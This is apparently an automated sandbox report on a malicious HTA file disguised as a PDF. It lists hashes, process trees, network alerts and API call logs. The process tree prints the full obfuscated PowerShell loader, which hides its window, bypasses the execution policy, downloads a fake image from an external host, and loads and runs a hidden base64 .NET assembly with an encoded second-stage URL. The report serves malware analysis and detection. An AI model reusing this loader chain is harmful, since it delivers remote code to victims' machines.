Summary | ZeroBOX

XLARFQ77802578790.pdf.hta

Generic Malware Antivirus AntiDebug MSOffice File AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 Oct. 31, 2023, 5:31 p.m. Oct. 31, 2023, 5:33 p.m.
Size 112.9KB
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 9f5447784eb960df0833273eded3324c
SHA256 2da026ec237903e5de38b8f9f37183229db7601933ad5e1f247a8f73a3cbf2cb
CRC32 DE304A32
ssdeep 768:iNMAbaHvu4Sc1kLIWIqKsVsfscsNsWsysasUs4sLsrsFsHsusVsvsMsTs4sKsksa:iGAX4Dt7pp95
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\XLARFQ77802578790.pdf.hta.html

    904
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:904 CREDAT:145409

      2264
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

        1968
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

          2216

Name Response Post-Analysis Lookup
imageupload.io 172.67.222.26
IP Address Status Action
104.21.83.102 Active Moloch
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49175 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49176 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49174 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49178 -> 104.21.83.102:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49178
104.21.83.102:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io b1:21:d8:81:60:0d:67:7c:14:72:94:30:ff:a0:2d:d7:b8:50:dd:46

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x0000000000000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000030d7e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5e7f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5e7f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5e7f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600a30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600a30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600e90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600e90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600e90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6013d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6013d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6013d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6013d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6013d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601360
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b600b10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b601670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6016e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6016e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b627aa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b627aa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000301c00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5ae920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5ae920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5ae920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5c3430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5c3430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5c3580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5c3580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5c3580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5c3580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 99083376
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 99089328
registers.r11: 99085136
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1926918805
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 904
region_size: 14225408
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002840000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 904
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000035d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 904
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001240000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef69c9000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feeccd9000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2264
region_size: 4657152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000030e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2264
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003550000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
